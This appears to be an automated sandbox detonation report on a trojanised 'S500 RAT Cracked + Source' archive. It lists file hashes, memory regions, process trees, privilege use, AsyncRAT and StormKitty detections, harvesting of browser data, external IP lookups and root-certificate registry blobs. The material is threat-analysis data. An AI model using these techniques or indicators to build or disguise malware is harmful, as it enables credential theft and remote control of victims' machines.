SHA512 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

MD5 7ba3ab7d000bd8f2206e08abdbe74d7d
SHA1 6940a66fecfed2706db0368b36a9a27f20b93e25
SHA256 05156b19fa8699fa4aa7f59d07fb78730d5313d025c242ac4cdf591d928e97e1
SHA512 c42a3fe48e2bad222a72742028e2709a59fa0d36915c07f7332436d31b452ce358765c418fc7f0011849e10468363470f732b56b2c17029e5003b9c9ef033249

memory/4228-999-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

MD5 9b694ed7d344cd6f2e02977fbdc07a0a
SHA1 2bc6f78a91b26026c51051e646d788488c776855
SHA256 2bcd8656e5e55f05143a5fd31434719e0b843567f3a7b69a392b4abb17fc63bd
SHA512 6ce0b9a9cac4b42ffd8c7f337a41e475595b051c68529e299df7519016c7b9883af10921683a919fe8ae3069740d4c96d4f645edeb0891fc4e01fc73b17a2518

C:\Users\Admin\AppData\Local\Temp\3E04.tmp\3E05.tmp\3E06.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oyauzrce.43f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5036-1008-0x000001DE72EC0000-0x000001DE72EE2000-memory.dmp

memory/5036-1013-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/5036-1014-0x000001DE724D0000-0x000001DE724E0000-memory.dmp

memory/5036-1015-0x000001DE724D0000-0x000001DE724E0000-memory.dmp

memory/5036-1018-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/4228-1019-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\cGeoIp.dll

MD5 6d6e172e7965d1250a4a6f8a0513aa9f
SHA1 b0fd4f64e837f48682874251c93258ee2cbcad2b
SHA256 d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0
SHA512 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155

C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\protobuf-net.dll

MD5 9fbb8cec55b2115c00c0ba386c37ce62
SHA1 e2378a1c22c35e40fd1c3e19066de4e33b50f24a
SHA256 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026
SHA512 da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04

C:\Users\Admin\AppData\Local\Temp\7zE85E1A78A\Vestris.ResourceLib.dll

MD5 944ce5123c94c66a50376e7b37e3a6a6
SHA1 a1936ac79c987a5ba47ca3d023f740401f73529b
SHA256 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a
SHA512 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe

MD5 7a8d11174bebefad4409d477b20825b7
SHA1 b6d0e9230fe339b4d200acbf401f66a6facd3a08
SHA256 0760e54f54e20d7d63e5016eb204e913633ce5857d1fc722ac39977453712e3b
SHA512 2116a695a640390fdf6558c6def1900eb6edff1ac3e65030ea81ae346f1965135ab97600c4c20cb3bddc7db643e42cc74e88829bf78c9d254e7014648b88f2cb

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\ServerRegistrationManager.exe

MD5 9e83a638e31058801b0ddeea8202760d
SHA1 9fdfafd6855469dd3f6171f7c6283d94c477e9e8
SHA256 6f296f3c16c7aba99d3ed032a186934280bda76db96e9322bef5193d306a8df7
SHA512 20378249a49ecb99367c715087cb2b80b1a75c198b67e0c800c458b7d2f403e85e295d00f612cf8f12b0dd6698062a761e71e2ae7477e117dce5eb394770d10c

memory/3176-1310-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/3176-1311-0x0000023737FA0000-0x0000023739064000-memory.dmp

memory/3176-1312-0x0000023739430000-0x0000023739440000-memory.dmp

memory/3176-1314-0x00000237538D0000-0x0000023753AC4000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\Guna.UI2.dll

MD5 4544872c197f9ad471bb18c648b004b0
SHA1 280a1ec5ab002d1ab15279b3fb0de8dd3c4aa482
SHA256 bf4aec4b6a094c21008b4788be9ca7072fcff0800cf1c098828222769b311e7b
SHA512 aaf6a5a357976f6a83672009d3648f4dd7303bdd91eeca6b2d1ce35f59cb65563daa70505162f862bb7ce322d9645dbabd49e9a8f8a9e22d4d169f3d59ac8aca

C:\Users\Admin\Desktop\S500 RAT Source Code\bin\Debug\net48\S500RAT.pdb

MD5 e90f5f88df944bd07f5e2f42a2665200
SHA1 f1f55ee3fe858e854848d4c3ccdebc9b3009f638
SHA256 e4770d767eed1e5bf31d2eeb8e543b60eeffff423515eb60a1c9329ff66ea9dc
SHA512 c605c4f392cfa61e50b47c2d24c4a69d54f657e4f6c99a8da73cc0ae2d240257f4bedbcb508757e70e96f868e078e6d8969ad94fb677356fa9278279e45c82da

memory/3176-1316-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/1536-1317-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1318-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1319-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4044-1321-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/4044-1322-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp

memory/4516-1323-0x0000000000400000-0x0000000000439000-memory.dmp

memory/4044-1324-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef5ef35c3059825861b16409862d0e3d
SHA1 cde5311765478b1bcf309219c1a86a0238612099
SHA256 53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b
SHA512 3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

memory/1536-1339-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/4044-1338-0x00000134B5EB0000-0x00000134B5EC0000-memory.dmp

memory/1536-1340-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1341-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1342-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1343-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1344-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/1536-1345-0x000002A242AC0000-0x000002A242AC1000-memory.dmp

memory/4044-1346-0x00000134B7590000-0x00000134B7D36000-memory.dmp

memory/4044-1349-0x00007FFA677D0000-0x00007FFA68291000-memory.dmp

memory/4516-1350-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO85E5D4EA\Readme.txt

MD5 531208ea558a68c95339bea9517845c3
SHA1 95865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256 dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA512 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:56

Platform

win11-20240214-en

Max time kernel

1288s

Max time network

1272s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 36 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 36 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3556 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 3556 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 87ca06f69c513f4fbbf67c5b4e366210
SHA1 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa
SHA256 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5
SHA512 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb

memory/3796-232-0x0000000000FF0000-0x0000000001118000-memory.dmp

memory/3796-234-0x00007FFC2C450000-0x00007FFC2CF12000-memory.dmp

memory/3796-235-0x000000001BE00000-0x000000001BE10000-memory.dmp

memory/3796-236-0x00007FFC2C450000-0x00007FFC2CF12000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

MD5 d5b77dfb5f248f3aabc560d8300088c5
SHA1 bbf7bb5f78051a59e725920cea3d54d1e7473cea
SHA256 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55
SHA512 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:47

Platform

win7-20240221-en

Max time kernel

1313s

Max time network

1240s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A icanhazip.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
